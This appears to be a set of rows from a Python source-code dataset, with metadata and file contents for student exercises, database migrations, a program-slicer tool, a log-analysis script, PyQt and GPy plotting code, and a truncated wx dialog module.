blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 257 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
98ac2964ff10598c3fddd341223f1ebabd976588 | f9b465ca5aa3f82afbe044b4eea67046f4668540 | /prac_07/languages.py | af6c6533e1aef4fa65f498e5b251e8efb18298a4 | [] | no_license | TylerLangtry/CP1404_Practicals | 125dd1cc38cbee11a8ee28fd8ff9f56a59cbe1dd | 2b013c0397886d889c6870fef0e4dc611040f087 | refs/heads/master | 2021-04-03T05:08:36.596570 | 2018-05-22T00:37:47 | 2018-05-22T00:37:47 | 124,964,235 | 0 | 0 | null | 2018-03-27T00:55:18 | 2018-03-12T23:29:27 | Python | UTF-8 | Python | false | false | 539 | py | from prac_07.programming_language import ProgrammingLanguage
ruby = ProgrammingLanguage("Ruby", "Dynamic", True, 1995)
print(ruby)
python = ProgrammingLanguage("Python", "Dynamic", True, 1991)
print(python)
visual_basic = ProgrammingLanguage("Visual Basic", "Static", False, 1991)
print(visual_basic)
programs = [ruby, python, visual_basic]
print("The dynamically typed languages are:")
for program in programs:
if program.is_dynamic():
print(program.name)
print(program.name for program in programs if program.is_dynamic()) | [
"tyler.langtry@my.jcu.edu.au"
] | tyler.langtry@my.jcu.edu.au |
a489cb86e3d6939f0b958404a7c004ab41e60639 | 27d500f0580c0a4dc19fa2be79a04abca1371ca6 | /foods/migrations/0004_auto_20210226_1840.py | 9d9893883a3ad48ccc690535bd8a09629ff4a689 | [] | no_license | farimaz/Restaurant-Django | 22926701fd4288d4fc1416196336675cc0e2adee | 76d97d67185f0a48f48ef38adc591be8285a18af | refs/heads/master | 2023-04-04T06:26:45.043182 | 2021-04-16T13:01:49 | 2021-04-16T13:01:49 | 358,606,232 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 548 | py | # Generated by Django 3.1.6 on 2021-02-26 15:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('foods', '0003_foods_type_food'),
]
operations = [
migrations.AlterField(
model_name='foods',
name='type_food',
field=models.CharField(choices=[('breakfast', 'صبحانه'), ('drinks', 'نوشیدنی'), ('dinner', 'شام'), ('lunch', 'ناهار')], default='drink', max_length=10, verbose_name='نوع غذا'),
),
]
| [
"spacemazoochie@gmail.com"
] | spacemazoochie@gmail.com |
f6259ec0a87853d62adeaa4ed05a99c2c77530c2 | 90ea87947e0e1511b6f9312d1ec6f19619b1e90d | /test.py | e69343a676f1b8f03655efe07e6d466d1849a779 | [] | no_license | sahilgupta-gti/demo1 | 7ebb188ecb5a7bd5b1a3a669d18f6ea5f4dae1c2 | 6f1384c7fd7080af5051ea716173366bd74fdde9 | refs/heads/master | 2022-04-21T22:30:20.772440 | 2020-04-27T14:14:08 | 2020-04-27T14:14:08 | 163,744,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | #! /bin/python
#from numpy import *
# from array import *
import sys
from Student import *
x = int(sys.argv[1])
y = int(sys.argv[2])
def factorial(f):
if f == 1:
return f
return f * factorial(f-1)
fact = 6
print(factorial(fact))
print(__name__)
st1 = Student("Gunnu", "UKG")
print(st1.school, " : ", st1.getName(), " ", st1.getCls())
Student.setSchoolName("DAV")
st2 = Student("Sahil", "LKG")
print(st2.school, " : ", st2.getName(), " -- ", st2.getCls())
print("printing sum : ",st2.sum(1)) | [
"sahilgupta_gti@yahoo.com"
] | sahilgupta_gti@yahoo.com |
755de45cae37769f8ee5cd50dd2018b09c93b4de | c7dae6ec1d683abe235c524b2a7f922acd0bee6d | /src/main.py | ba98e83190906a3f8fc9a7d1ff2c2353067f955e | [] | no_license | anjanabensy/Programslicer | 7374c181c6f4835ef12b9276a4d19473f1a28123 | 6faa340b8b6b92bb2defdd0f1c1677baba5b258f | refs/heads/master | 2022-12-13T21:43:34.172795 | 2020-09-09T07:28:59 | 2020-09-09T07:28:59 | 284,042,536 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,244 | py | import nltk
import ast
import re
import array as arr;
from _collections import deque
import lexer as lex
import slicer as s
import argparse
import traceback
program = []
endline =''
vars = ''
file =''
linecount=0
Slice = ''
lexer_result = []
line_opt =[]
""" checks whether the given slice criterion is valid with respect to the program to be sliced """
def validat_slice():
global linecount
global Slice
global lexer_result
count = 0
c1= 0
c2= 1
identifier_output = lexer_result[1]
slicepoint = (str(Slice).split(','))
lineno = slicepoint[0]
identifier = slicepoint[1]
if(int(lineno)>linecount):
print('Program point does not exist.Please enter a valid line number')
c1= 1
for i in identifier_output:
if(i.count(identifier)>=1):
c2=0
break
if(c2==1):
print('Variable does not exist within given program point.Please enter a valid variable')
count = c1+c2
return count
""" processes the slice criterion and passes the program to the lexer module """
def loadfile(file):
global endline
global linecount
global Slice
global lexer_result
valid = 1
#mylabel = tkinter.Label(root, text='')
#mylabel["text"]=''
f = 'Selected program'
if(file is not None):
proglist = list(str(program).split("\n"))
linecount= 0
for k in proglist:
linecount=linecount+1
f = f+'\n'+str(linecount)+'.'+k
print(f)
lexer_result = lex.tokenize_program(program)
c=0
while(valid>0):
c=c+1
Slice = input("\nEnter the slice criteria (p, V):")
valid = validat_slice()
return [Slice,lexer_result]
""" sends the program and slicing criterion to the slicer module to perform the slicing"""
def getfile(program,Slice,lexer_result,filepath):
global endline
global vars
global line_opt
#print('slice val is ',slice)
if program is not None:
x = str(Slice).split(',')
endline = x[0]
var_value = x[1]
#res = lex.tokenize_program(program)
s.check_Indentation(lexer_result[0])
s.setfirstsliceno(x,lexer_result[0],lexer_result[1],lexer_result[2])
Finalvals = s.print_Slice(lexer_result[0],lexer_result[1],endline,line_opt,lexer_result[2],filepath,x)
s.clearvars()
line_opt.clear()
return Finalvals
#print(vars)
""" adds various command line options for the application and processes them """
def argsparseroption():
global line_opt
parser = argparse.ArgumentParser(add_help=False)
text = 'Slice criteria Format :s,v where s is the point of interest and v is the variable'
linetext = 'Prints the slice with the line numbers of the input program'
filetext = 'Writes the slice to the specified file and saves in src/progfiles folder'
tracetext = 'Prints the slice with trace back details'
parser.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS,
help=text)
requiredNamed = parser.add_argument_group('Required Arguments')
requiredNamed.add_argument('--f',help='file to be sliced',required=True)
parser.add_argument('--l', '--lineno', action='store_true',
help=linetext)
parser.add_argument('--o','--ofile', nargs='?', const='o', type=str,help=filetext)
parser.add_argument('--t', '--trace', action='store_true',
help=tracetext)
args = parser.parse_args()
if(args.f):
c = args.f
if(args.l):
line_opt.append('l')
if(args.o):
line_opt.append(args.o)
if(args.t):
line_opt.append('t')
return str(c)
""" executes the below mentioned functions when the module is executed for the first time """
if __name__ == '__main__':
try:
filepath = argsparseroption()
#filepath = input("Enter the filepath:")
f = open(filepath, 'r')
program = f.read()
res = loadfile(program)
getfile(program,res[0],res[1],filepath)
except Exception as e:
print(traceback.format_exc())
| [
"anjanabensy95@gmail.com"
] | anjanabensy95@gmail.com |
cc348ab4bec613d2e38dbef4d3ac3c828374b571 | 3439921d03520834cb425a74eb3fde9a18facebc | /bubble sort.py | bc88fca94eff5c2638b245b63b0aa3c45c440af2 | [] | no_license | msobanjo/vrbh_sim | 6f838ddf033f3303dfd716ff78e364428d8c10aa | 4c512aa112b9bd55e9d902665c025cf283ff9309 | refs/heads/master | 2021-01-15T14:02:37.391144 | 2016-03-13T19:18:31 | 2016-03-13T19:18:31 | 50,657,586 | 0 | 0 | null | 2016-01-29T11:09:29 | 2016-01-29T11:09:29 | null | UTF-8 | Python | false | false | 415 | py | import random
def bubbleSort(randomItems):
for x in range(len(randomItems)-1,0,-1):
for i in range(x):
if randomItems[i]>randomItems[i+1]:
temp = randomItems[i]
randomItems[i] = randomItems[i+1]
randomItems[i+1] = temp
randomItems = [random.randint(-50, 100) for c in range(10)]
print(randomItems)
bubbleSort(randomItems)
print(randomItems)
| [
"msobanjo@hotmail.com"
] | msobanjo@hotmail.com |
9619c9505c4078b5776f7baea641f09f202fc2d7 | dace991e0b45bc4e2169b551bb58297215c11c9c | /queries.py | 02a2ce6ee04e3590d953c73295858ef6be5f3b90 | [] | no_license | snehakale/Logs-Analysis-Project | f042b7f79c32227a72a2cfc8804800e2f910b031 | cbcd7270755c962afd00ccc9dd5111f3be0d8724 | refs/heads/master | 2021-07-12T03:56:37.975836 | 2017-10-11T17:15:19 | 2017-10-11T17:15:19 | 106,340,650 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,678 | py | #! /usr/bin/env python3
''' This file is a python program (version 3.6.2)
which makes a connection with the database,
creates and executes postgresql queries to get the logs information.
'''
# importing python DB-API
import psycopg2
# function to make a connection with the database and to get the cursor
def db_connect(database_name):
try:
db = psycopg2.connect("dbname={}".format(database_name))
cursor = db.cursor()
return db, cursor
except:
print("Error while connecting to the database.")
# function to execute the queries and to get the results
def get_result():
db, cursor = db_connect("news")
# To get the most popular 3 articles of all time
query1 = ("select a.title , count(l.path) from articles as a, log as l "
"where '/article/'||a.slug like l.path "
"group by a.title order by count(l.path) desc limit 3;")
cursor.execute(query1)
rows1 = cursor.fetchall()
# printing the result
print(" ")
print("The most popular three articles of all time are :")
for row in rows1:
print('{} - {} views'.format(row[0], row[1]))
# To get most popular article authors of all time
query2 = ("select t.name, count(l.path) from authors as t "
"join articles as a on t.id = a.author "
"join log as l on '/article/'||a.slug = l.path "
"group by t.name order by count(l.path) desc;")
cursor.execute(query2)
rows2 = cursor.fetchall()
# printing the result
print(" ")
print("The most popular article authors of all time are :")
for row in rows2:
print('{} - {} views'.format(row[0], row[1]))
# To get on which days did more than 1% of requests lead to errors
query3 = ("select l1.date1, ((errors*100)/(success+errors))::float "
"as percentage "
"from (select date(time) as date1, count(*) as success "
"from log where status like '%200%' group by date(time)) as l1 "
"join (select date(time) as date2, count(*) as errors "
"from log where status like '%404%' group by date(time)) as l2 "
"on l1.date1 = l2.date2 "
"where ((errors*100)/(success + errors))::float "
"> (0.01)::float;")
cursor.execute(query3)
rows3 = cursor.fetchall()
# printing the result
print(" ")
print("Days which did more than 1% of requests lead to errors are :")
for row in rows3:
print('{:%m/%d/%y} - {} %'.format(row[0], row[1]))
# closing the connection with databse
db.close()
# Calling function get_result to get the output
get_result()
| [
"kalesneha88@gmail.com"
] | kalesneha88@gmail.com |
2613e2ef412ccf078a9d7d9382a5579ecc20064d | b8c2d5320a70fafd44bff028210694c4446ee296 | /Project2/venv/bin/pip | b219c25bca7358e7e94787d9435c39db4b2f85a3 | [] | no_license | kelseydeuth/202 | b6032a5ec378c4ead949e9c6727ddf5e4744a4bd | 246d8ed5d3662483ba71d220461e8bad843588f5 | refs/heads/master | 2020-05-07T16:39:25.028624 | 2019-06-10T16:41:47 | 2019-06-10T16:41:47 | 180,691,975 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | #!/Users/kelseydeuth/Workspace/202/Project2/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip')()
)
| [
"kelseydeuth@Kelseys-MacBook-Pro.local"
] | kelseydeuth@Kelseys-MacBook-Pro.local | |
0dbfb93d76694fbd077ed77dc8a28f2efac852ef | 88f026696ef1d0ee362f559c22fae1beeaf00033 | /software/reference/code_reference/QT/DualScreenTest/main.py | 60a03e3cb9cd0a4e361e179d7388ee17aeeeddd8 | [] | no_license | OSURoboticsClub/Rover_2018_2019 | 2b1b67ecb98f2f9f13a1ec38ab9986a7729b85d2 | d615463cd3cbddf1531511a42364e13f3c179f54 | refs/heads/master | 2020-04-01T05:10:45.129837 | 2019-08-12T17:11:43 | 2019-08-12T17:11:43 | 152,893,228 | 8 | 5 | null | 2019-07-29T03:04:39 | 2018-10-13T16:48:35 | C++ | UTF-8 | Python | false | false | 3,077 | py | #!/usr/bin/env python
"""
Main file used to launch the Rover Base Station
No other files should be used for launching this application.
"""
#####################################
# Imports
#####################################
# Python native imports
import sys
from PyQt5 import QtWidgets, QtCore, uic
import signal
# Custom Imports
#####################################
# Global Variables
#####################################
UI_FILE_LEFT = "Resources/UI/RoverGui.ui"
UI_FILE_RIGHT = "Resources/UI/RoverGui2.ui"
FORM_LEFT, BASE_UI_LEFT = uic.loadUiType(UI_FILE_LEFT)
FORM_RIGHT, BASE_UI_RIGHT = uic.loadUiType(UI_FILE_RIGHT)
LEFT_SCREEN_ID = 0
RIGHT_SCREEN_ID = 1
#####################################
# Application Class Definition
#####################################
class LeftWindow(BASE_UI_LEFT, FORM_LEFT):
kill_threads_signal = QtCore.pyqtSignal()
def __init__(self, parent=None):
# noinspection PyArgumentList
super(BASE_UI_LEFT, self).__init__(parent)
self.setupUi(self)
#####################################
# Application Class Definition
#####################################
class RightWindow(BASE_UI_RIGHT, FORM_RIGHT):
kill_threads_signal = QtCore.pyqtSignal()
def __init__(self, parent=None):
# noinspection PyArgumentList
super(BASE_UI_RIGHT, self).__init__(parent)
self.setupUi(self)
#####################################
# Main Definition
#####################################
if __name__ == "__main__":
signal.signal(signal.SIGINT, signal.SIG_DFL) # This allows the keyboard interrupt kill to work properly
application = QtWidgets.QApplication(sys.argv) # Create the base qt gui application
system_desktop = QtWidgets.QDesktopWidget() # This gets us access to the desktop geometry
app_window = LeftWindow() # Make a window in this application
app_window.setWindowTitle("Rover Control") # Sets the window title
app_window.setWindowFlags(app_window.windowFlags() | # Sets the windows flags to:
QtCore.Qt.FramelessWindowHint | # remove the border and frame on the application,
QtCore.Qt.WindowStaysOnTopHint | # and makes the window stay on top of all others
QtCore.Qt.X11BypassWindowManagerHint) # This is needed to show fullscreen in gnome
app_window.setGeometry(system_desktop.screenGeometry(LEFT_SCREEN_ID)) # Sets the window to be on the first screen
app_window.showFullScreen() # Shows the window in full screen mode
app_window2 = RightWindow()
app_window2.setWindowTitle("Rover Video")
app_window2.setWindowFlags(app_window.windowFlags() |
QtCore.Qt.FramelessWindowHint |
QtCore.Qt.WindowStaysOnTopHint |
QtCore.Qt.X11BypassWindowManagerHint)
app_window2.setGeometry(system_desktop.screenGeometry(RIGHT_SCREEN_ID))
app_window2.showFullScreen()
application.exec_() # Execute launching of the application
| [
"chayap@oregonstate.edu"
] | chayap@oregonstate.edu |
2f6bbc0794f3dde324782c7c71e14ddcb49364ff | 9a01c9106a4cc641a37ad072d841f5607a3deb63 | /migrations/versions/006_add_telegramm_id.py | ed18e08ed712cc257ff1b4137e29cdeed4d951a9 | [] | no_license | maddeer/bookshell | 51f761e08148d77b3841736c27aceba9d9357322 | 9d2cd33342109d1a996a366d100832632d4b11ad | refs/heads/master | 2021-07-22T17:58:46.476972 | 2017-11-04T13:04:58 | 2017-11-04T13:04:58 | 104,572,632 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 583 | py | from sqlalchemy import *
from migrate import *
meta = MetaData()
def upgrade(migrate_engine):
# Upgrade operations go here. Don't create your own engine; bind
# migrate_engine to your metadata
meta.bind = migrate_engine
users_table = Table('user', meta, autoload=True)
telegram_id = Column('telegram_id', Integer)
telegram_id.create(users_table)
def downgrade(migrate_engine):
# Operations to reverse the above upgrade go here.
meta.bind = migrate_engine
users_table = Table('user', meta, autoload=True)
users_table.c.telegram_id.drop()
| [
"timonnius@gmail.com"
] | timonnius@gmail.com |
1856097d55982c651ccb71ab0b51f7fa59839318 | c7386a7a7aafabe9feb8368c42b607cff70dcfe7 | /01_GPLVM_Training/GPy/plotting/matplot_dep/plot_definitions.py | 0e3bc32d398084b4f35cc48526b06f520e9121e8 | [] | no_license | dechamoungsri/Prosody_modeling | 8f3d603af6c54786cb048186bab65cfcd5b441f1 | 7895a032dde1c2c34cf42b7c362ca2b61ada0f37 | refs/heads/master | 2021-08-31T02:32:42.813986 | 2017-12-20T06:42:36 | 2017-12-20T06:42:36 | 114,848,055 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,812 | py | #===============================================================================
# Copyright (c) 2015, Max Zwiessele
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of GPy.plotting.matplot_dep.plot_definitions nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#===============================================================================
import numpy as np
from matplotlib import pyplot as plt
from ..abstract_plotting_library import AbstractPlottingLibrary
from .. import Tango
from . import defaults
from matplotlib.colors import LinearSegmentedColormap
from .controllers import ImshowController, ImAnnotateController
import itertools
from .util import legend_ontop
class MatplotlibPlots(AbstractPlottingLibrary):
def __init__(self):
super(MatplotlibPlots, self).__init__()
self._defaults = defaults.__dict__
def figure(self, rows=1, cols=1, gridspec_kwargs={}, tight_layout=True, **kwargs):
fig = plt.figure(tight_layout=tight_layout, **kwargs)
fig.rows = rows
fig.cols = cols
fig.gridspec = plt.GridSpec(rows, cols, **gridspec_kwargs)
return fig
def new_canvas(self, figure=None, row=1, col=1, projection='2d', xlabel=None, ylabel=None, zlabel=None, title=None, xlim=None, ylim=None, zlim=None, **kwargs):
if projection == '3d':
from mpl_toolkits.mplot3d import Axes3D
elif projection == '2d':
projection = None
if 'ax' in kwargs:
ax = kwargs.pop('ax')
else:
if figure is not None:
fig = figure
elif 'num' in kwargs and 'figsize' in kwargs:
fig = self.figure(num=kwargs.pop('num'), figsize=kwargs.pop('figsize'))
elif 'num' in kwargs:
fig = self.figure(num=kwargs.pop('num'))
elif 'figsize' in kwargs:
fig = self.figure(figsize=kwargs.pop('figsize'))
else:
fig = self.figure()
#if hasattr(fig, 'rows') and hasattr(fig, 'cols'):
ax = fig.add_subplot(fig.gridspec[row-1, col-1], projection=projection)
if xlim is not None: ax.set_xlim(xlim)
if ylim is not None: ax.set_ylim(ylim)
if xlabel is not None: ax.set_xlabel(xlabel)
if ylabel is not None: ax.set_ylabel(ylabel)
if title is not None: ax.set_title(title)
if projection == '3d':
if zlim is not None: ax.set_zlim(zlim)
if zlabel is not None: ax.set_zlabel(zlabel)
return ax, kwargs
def add_to_canvas(self, ax, plots, legend=False, title=None, **kwargs):
#ax.autoscale_view()
fontdict=dict(family='sans-serif', weight='light', size=9)
if legend is True:
ax.legend(*ax.get_legend_handles_labels())
elif legend >= 1:
#ax.legend(prop=fontdict)
legend_ontop(ax, ncol=legend, fontdict=fontdict)
if title is not None: ax.figure.suptitle(title)
return ax
def show_canvas(self, ax):
ax.figure.canvas.draw()
return ax.figure
def scatter(self, ax, X, Y, Z=None, color=Tango.colorsHex['mediumBlue'], label=None, marker='o', **kwargs):
if Z is not None:
return ax.scatter(X, Y, c=color, zs=Z, label=label, marker=marker, **kwargs)
return ax.scatter(X, Y, c=color, label=label, marker=marker, **kwargs)
def plot(self, ax, X, Y, Z=None, color=None, label=None, **kwargs):
if Z is not None:
return ax.plot(X, Y, color=color, zs=Z, label=label, **kwargs)
return ax.plot(X, Y, color=color, label=label, **kwargs)
def plot_axis_lines(self, ax, X, color=Tango.colorsHex['darkRed'], label=None, **kwargs):
from matplotlib import transforms
from matplotlib.path import Path
if 'marker' not in kwargs:
kwargs['marker'] = Path([[-.2,0.], [-.2,.5], [0.,1.], [.2,.5], [.2,0.], [-.2,0.]],
[Path.MOVETO, Path.LINETO, Path.LINETO, Path.LINETO, Path.LINETO, Path.CLOSEPOLY])
if 'transform' not in kwargs:
if X.shape[1] == 1:
kwargs['transform'] = transforms.blended_transform_factory(ax.transData, ax.transAxes)
if X.shape[1] == 2:
return ax.scatter(X[:,0], X[:,1], ax.get_zlim()[0], c=color, label=label, **kwargs)
return ax.scatter(X, np.zeros_like(X), c=color, label=label, **kwargs)
def barplot(self, ax, x, height, width=0.8, bottom=0, color=Tango.colorsHex['mediumBlue'], label=None, **kwargs):
if 'align' not in kwargs:
kwargs['align'] = 'center'
return ax.bar(left=x, height=height, width=width,
bottom=bottom, label=label, color=color,
**kwargs)
def xerrorbar(self, ax, X, Y, error, color=Tango.colorsHex['darkRed'], label=None, **kwargs):
if not('linestyle' in kwargs or 'ls' in kwargs):
kwargs['ls'] = 'none'
#if Z is not None:
# return ax.errorbar(X, Y, Z, xerr=error, ecolor=color, label=label, **kwargs)
return ax.errorbar(X, Y, xerr=error, ecolor=color, label=label, **kwargs)
def yerrorbar(self, ax, X, Y, error, color=Tango.colorsHex['darkRed'], label=None, **kwargs):
if not('linestyle' in kwargs or 'ls' in kwargs):
kwargs['ls'] = 'none'
#if Z is not None:
# return ax.errorbar(X, Y, Z, yerr=error, ecolor=color, label=label, **kwargs)
return ax.errorbar(X, Y, yerr=error, ecolor=color, label=label, **kwargs)
def imshow(self, ax, X, extent=None, label=None, vmin=None, vmax=None, **imshow_kwargs):
if 'origin' not in imshow_kwargs:
imshow_kwargs['origin'] = 'lower'
#xmin, xmax, ymin, ymax = extent
#xoffset, yoffset = (xmax - xmin) / (2. * X.shape[0]), (ymax - ymin) / (2. * X.shape[1])
#xmin, xmax, ymin, ymax = extent = xmin-xoffset, xmax+xoffset, ymin-yoffset, ymax+yoffset
return ax.imshow(X, label=label, extent=extent, vmin=vmin, vmax=vmax, **imshow_kwargs)
def imshow_interact(self, ax, plot_function, extent, label=None, resolution=None, vmin=None, vmax=None, **imshow_kwargs):
if imshow_kwargs is None: imshow_kwargs = {}
if 'origin' not in imshow_kwargs:
imshow_kwargs['origin'] = 'lower'
return ImshowController(ax, plot_function, extent, resolution=resolution, vmin=vmin, vmax=vmax, **imshow_kwargs)
def annotation_heatmap(self, ax, X, annotation, extent=None, label=None, imshow_kwargs=None, **annotation_kwargs):
if imshow_kwargs is None: imshow_kwargs = {}
if 'origin' not in imshow_kwargs:
imshow_kwargs['origin'] = 'lower'
if ('ha' not in annotation_kwargs) and ('horizontalalignment' not in annotation_kwargs):
annotation_kwargs['ha'] = 'center'
if ('va' not in annotation_kwargs) and ('verticalalignment' not in annotation_kwargs):
annotation_kwargs['va'] = 'center'
imshow = self.imshow(ax, X, extent, label, **imshow_kwargs)
if extent is None:
extent = (0, X.shape[0], 0, X.shape[1])
xmin, xmax, ymin, ymax = extent
xoffset, yoffset = (xmax - xmin) / (2. * X.shape[0]), (ymax - ymin) / (2. * X.shape[1])
xlin = np.linspace(xmin, xmax, X.shape[0], endpoint=False)
ylin = np.linspace(ymin, ymax, X.shape[1], endpoint=False)
annotations = []
for [i, x], [j, y] in itertools.product(enumerate(xlin), enumerate(ylin)):
annotations.append(ax.text(x+xoffset, y+yoffset, "{}".format(annotation[j, i]), **annotation_kwargs))
return imshow, annotations
def annotation_heatmap_interact(self, ax, plot_function, extent, label=None, resolution=15, imshow_kwargs=None, **annotation_kwargs):
if imshow_kwargs is None: imshow_kwargs = {}
if 'origin' not in imshow_kwargs:
imshow_kwargs['origin'] = 'lower'
return ImAnnotateController(ax, plot_function, extent, resolution=resolution, imshow_kwargs=imshow_kwargs or {}, **annotation_kwargs)
def contour(self, ax, X, Y, C, levels=20, label=None, **kwargs):
return ax.contour(X, Y, C, levels=np.linspace(C.min(), C.max(), levels), label=label, **kwargs)
def surface(self, ax, X, Y, Z, color=None, label=None, **kwargs):
return ax.plot_surface(X, Y, Z, label=label, **kwargs)
def fill_between(self, ax, X, lower, upper, color=Tango.colorsHex['mediumBlue'], label=None, **kwargs):
return ax.fill_between(X, lower, upper, facecolor=color, label=label, **kwargs)
def fill_gradient(self, canvas, X, percentiles, color=Tango.colorsHex['mediumBlue'], label=None, **kwargs):
ax = canvas
plots = []
if 'edgecolors' not in kwargs:
kwargs['edgecolors'] = 'none'
if 'facecolors' in kwargs:
color = kwargs.pop('facecolors')
if 'array' in kwargs:
array = kwargs.pop('array')
else:
array = 1.-np.abs(np.linspace(-.97, .97, len(percentiles)-1))
if 'alpha' in kwargs:
alpha = kwargs.pop('alpha')
else:
alpha = .8
if 'cmap' in kwargs:
cmap = kwargs.pop('cmap')
else:
cmap = LinearSegmentedColormap.from_list('WhToColor', (color, color), N=array.size)
cmap._init()
cmap._lut[:-3, -1] = alpha*array
kwargs['facecolors'] = [cmap(i) for i in np.linspace(0,1,cmap.N)]
# pop where from kwargs
where = kwargs.pop('where') if 'where' in kwargs else None
# pop interpolate, which we actually do not do here!
if 'interpolate' in kwargs: kwargs.pop('interpolate')
def pairwise(iterable):
"s -> (s0,s1), (s1,s2), (s2, s3), ..."
from itertools import tee
#try:
# from itertools import izip as zip
#except ImportError:
# pass
a, b = tee(iterable)
next(b, None)
return zip(a, b)
polycol = []
for y1, y2 in pairwise(percentiles):
import matplotlib.mlab as mlab
# Handle united data, such as dates
ax._process_unit_info(xdata=X, ydata=y1)
ax._process_unit_info(ydata=y2)
# Convert the arrays so we can work with them
from numpy import ma
x = ma.masked_invalid(ax.convert_xunits(X))
y1 = ma.masked_invalid(ax.convert_yunits(y1))
y2 = ma.masked_invalid(ax.convert_yunits(y2))
if y1.ndim == 0:
y1 = np.ones_like(x) * y1
if y2.ndim == 0:
y2 = np.ones_like(x) * y2
if where is None:
where = np.ones(len(x), np.bool)
else:
where = np.asarray(where, np.bool)
if not (x.shape == y1.shape == y2.shape == where.shape):
raise ValueError("Argument dimensions are incompatible")
from functools import reduce
mask = reduce(ma.mask_or, [ma.getmask(a) for a in (x, y1, y2)])
if mask is not ma.nomask:
where &= ~mask
polys = []
for ind0, ind1 in mlab.contiguous_regions(where):
xslice = x[ind0:ind1]
y1slice = y1[ind0:ind1]
y2slice = y2[ind0:ind1]
if not len(xslice):
continue
N = len(xslice)
p = np.zeros((2 * N + 2, 2), np.float)
# the purpose of the next two lines is for when y2 is a
# scalar like 0 and we want the fill to go all the way
# down to 0 even if none of the y1 sample points do
start = xslice[0], y2slice[0]
end = xslice[-1], y2slice[-1]
p[0] = start
p[N + 1] = end
p[1:N + 1, 0] = xslice
p[1:N + 1, 1] = y1slice
p[N + 2:, 0] = xslice[::-1]
p[N + 2:, 1] = y2slice[::-1]
polys.append(p)
polycol.extend(polys)
from matplotlib.collections import PolyCollection
if 'zorder' not in kwargs:
kwargs['zorder'] = 0
plots.append(PolyCollection(polycol, **kwargs))
ax.add_collection(plots[-1], autolim=True)
ax.autoscale_view()
return plots
| [
"mamegomaday@gmail.com"
] | mamegomaday@gmail.com |
7c31b34e4f744edea1e56b89ce641687443b1802 | 9463df28c60275a872c8ea891e731e5e6b14ac32 | /Mopy/mash/gui/dialog.py | ec918d9eb5678c19e5adf58d202329446d6ce5b0 | [] | no_license | Danjb1/Wrye-Mash | 091fc60aabd1d564fc6686e389cd992d001b550b | 9a93fe47e98cfc8e93769f6b45341f4e78c568fa | refs/heads/master | 2021-08-17T05:26:42.055368 | 2017-11-20T20:11:12 | 2017-11-20T20:12:42 | 111,451,108 | 0 | 0 | null | 2017-11-20T19:04:22 | 2017-11-20T19:04:22 | null | UTF-8 | Python | false | false | 4,958 | py | import wx
from .. import conf
from .. import globals
#import gui
from ..mosh import _
from .. import mosh
class ProgressDialog(mosh.Progress):
"""Prints progress to file (stdout by default)."""
def __init__(self,title=_('Progress'),message='',parent=None,
style=wx.PD_APP_MODAL|wx.PD_ELAPSED_TIME,interval=0.1):
self.dialog = wx.ProgressDialog(title,message,100,parent,style)
mosh.Progress.__init__(self,interval)
self.isDestroyed = False
def doProgress(self,progress,message):
if self.dialog:
self.dialog.Update(int(progress*100),message)
else:
raise gui.InterfaceError,_('Dialog already destroyed.')
def Destroy(self):
if self.dialog:
self.dialog.Destroy()
self.dialog = None
def TextEntry(parent,message,default=''):
"""Shows a text entry dialog and returns result or None if canceled."""
dialog = wx.TextEntryDialog(parent,message,default)
if dialog.ShowModal() != wx.ID_OK:
dialog.Destroy()
